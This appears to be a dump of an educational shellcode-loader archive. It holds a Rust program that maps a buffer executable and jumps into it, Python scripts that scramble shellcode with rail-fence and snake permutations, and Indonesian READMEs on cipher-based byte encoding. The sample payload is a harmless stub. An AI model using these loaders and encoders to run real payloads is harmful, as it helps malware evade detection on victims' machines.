PVOID Buffer; 21 | } ustring; 22 | ``` 23 | 24 | ### Reference 25 | 26 | - [WineAPI SystemFunction032](https://source.winehq.org/WineAPI/SystemFunction032.html) 27 | - [ReactOS SystemFunction032](https://doxygen.reactos.org/df/d13/sysfunc_8c.html#a66d55017b8625d505bd6c5707bdb9725) -------------------------------------------------------------------------------- /windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/misc/rust/memmap2/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies] 8 | memmap2 = "0.9.4" 9 | -------------------------------------------------------------------------------- /windows/writing/misc/rust/memmap2/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Alokasi area memory dan ubah permissions dengan [memmap2](https://crates.io/crates/memmap2). -------------------------------------------------------------------------------- /windows/writing/misc/rust/memmap2/src/main.rs: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Allocation and change permission with memmap2. 6 | memmap2 is a wrapper to memory operations (not only in windows). 7 | 8 | Compile: 9 | $ cargo build 10 | 11 | Technique: 12 | - allocation: VirtualAlloc 13 | - writing: 14 | - permission: 15 | - execution: unsafe call to function pointer 16 | */ 17 | 18 | use memmap2::MmapOptions; 19 | use std::mem::transmute; 20 | 21 | fn main() { 22 | // shellcode storage in stack 23 | let payload: [u8; 4] = [0x90, 0x90, 0xCC, 0xC3]; 24 | 25 | // allocate memory buffer for payload as READ-WRITE (no executable) 26 | let mut mmap = MmapOptions::new() 27 | .len(payload.len()) 28 | .map_anon() 29 | .expect("[-] unable to allocate"); 30 | 31 | // copy payload to the buffer 32 | mmap.copy_from_slice(&payload); 33 | 34 | // make buffer executable (R-X) 35 | let mmap = mmap 36 | .make_exec() 37 | .expect("[-] unable to change permission"); 38 | 39 | // cast the payload into function and execute 40 | unsafe { 41 | let ep: extern "C" fn() = transmute(mmap.as_ptr()); 42 | ep(); 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /windows/writing/permutation/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan shuffle/permutation, mengacak urutan byte shellcode. Penjadwalan urutan berdasarkan seed. 6 | 7 | Shellcode yang tersimpan memiliki format `[Seed] [Encoded Shellcode]`. 8 | -------------------------------------------------------------------------------- /windows/writing/permutation/column-ordering/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Membentuk matrix dan mengatur posisi byte berdasarkan urutan kolom. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Seed] [Encoded Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/permutation/column-ordering/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/column-ordering/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/fisher-yates/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Menggunakan Fisher-Yates Shuffle untuk melakukan permutasi. 8 | 9 | ### Reference 10 | 11 | - [Wiki Fisher-Yates Shuffle](https://en.wikipedia.org/wiki/Fisher%E2%80%93Yates_shuffle) -------------------------------------------------------------------------------- /windows/writing/permutation/fisher-yates/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/fisher-yates/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/rail-fence/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Mengatur posisi byte dalam shellcode menggunakan algoritma rail-fence (zig-zag) cipher. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 10 | 11 | ### Reference 12 | 13 | - [Wiki Rail-Fence Cipher](https://en.wikipedia.org/wiki/Rail_fence_cipher) 14 | - [online encoder/decoder](https://www.dcode.fr/rail-fence-cipher) -------------------------------------------------------------------------------- /windows/writing/permutation/rail-fence/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | # encode the shellcode 11 | key = random.randrange(2, 10) 12 | enc_shcode = [key] + [0 for c in range(shlen)] 13 | 14 | p = 1 15 | s = [(key-1)*2, 0] 16 | 17 | for i in range(0, key): 18 | j = i 19 | idx = 0 20 | 21 | while j < shlen: 22 | enc_shcode[p] = shcode[j] 23 | 24 | if s[idx] > 0: 25 | j += s[idx] 26 | p += 1 27 | 28 | idx = (idx + 1) & 1 29 | 30 | s[0] -= 2 31 | s[1] += 2 32 | 33 | # print as C-array 34 | print("{ ", end='') 35 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 36 | print(" }") 37 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/writing/permutation/rail-fence/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/rail-fence/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/row-ordering/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Membentuk matrix dan mengatur posisi byte berdasarkan urutan baris. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Seed] [Encoded Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/permutation/row-ordering/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/row-ordering/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/snake/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Mengatur posisi byte dalam shellcode dengan pola mengular. 8 | 9 | contoh: 10 | 11 | ``` 12 | awal: 13 | 1 2 3 4 14 | 5 6 7 8 15 | 9 10 11 12 16 | hasil: 17 | 1 2 3 4 8 7 6 5 9 10 11 12 18 | ``` 19 | 20 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 21 | 22 | ### Reference 23 | -------------------------------------------------------------------------------- /windows/writing/permutation/snake/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | # encode the shellcode 11 | # how many row? 12 | rows = random.randrange(2, 5) 13 | 14 | remainder = shlen % rows 15 | if remainder > 0: 16 | extra = (rows - remainder) 17 | 18 | shlen += extra 19 | shcode += b"\x00" * extra 20 | 21 | cols = shlen // rows 22 | enc_shcode = [rows] 23 | 24 | for r in range(0, rows): 25 | start = r * cols 26 | end = (r + 1) * cols 27 | 28 | shrow = shcode[start:end] 29 | 30 | if r % 2 == 1: 31 | enc_shcode += shrow[::-1] 32 | else: 33 | enc_shcode += shrow 34 | 35 | # print as C-array 36 | print("{ ", end='') 37 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 38 | print(" }") 39 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/writing/permutation/snake/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/snake/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/spiral/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Mengatur posisi byte dalam shellcode dengan pola spiral. 8 | 9 | contoh: 10 | 11 | ``` 12 | awal: 13 | 1 2 3 4 14 | 5 6 7 8 15 | 9 10 11 12 16 | 13 14 15 16 17 | hasil: 18 | 1 2 3 4 8 12 16 15 14 13 9 5 6 7 11 10 19 | ``` 20 | 21 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 22 | 23 | ### Reference 24 | -------------------------------------------------------------------------------- /windows/writing/permutation/spiral/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/spiral/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/affine-cipher/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transforming the shellcode by byte substitution. 4 | 5 | ### Overview 6 | 7 | Menggunakan enkripsi klasik Affine Cipher untuk mengganti byte sesuai rumus `(ax + b) mod m` dengan a=197, b=37, m=256. Dekripsi menggunakan rumus `i(y - b) mod m` dengan i merupakan inverse dari a yakni i=13, b=37, dan m=256. -------------------------------------------------------------------------------- /windows/writing/substitution/affine-cipher/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/substitution/affine-cipher/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/atbash/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transforming the shellcode by byte substitution. 4 | 5 | ### Overview 6 | 7 | Menggunakan enkripsi klasik Atbash untuk mengganti byte berdasarkan pemetaan alfabet. Rumus matematis untuk enkripsi dan dekripsi (dalam 256 kemungkinan alfabet) adalah: `255-x` -------------------------------------------------------------------------------- /windows/writing/substitution/atbash/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/substitution/atbash/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/hill-cipher/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transforming the shellcode by byte substitution. 4 | 5 | ### Overview 6 | 7 | Menggunakan enkripsi klasik Hill Cipher untuk mengganti byte melalui perkalian matriks untuk setiap pasang byte. Rumus yang digunakan untuk sample ini adalah matriks `[[197, 0], [0, 173]]` dan matriks invers `[[13, 0], [0, 37]]` -------------------------------------------------------------------------------- /windows/writing/substitution/hill-cipher/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/substitution/hill-cipher/c++/shellcode.bin --------------------------------------------------------------------------------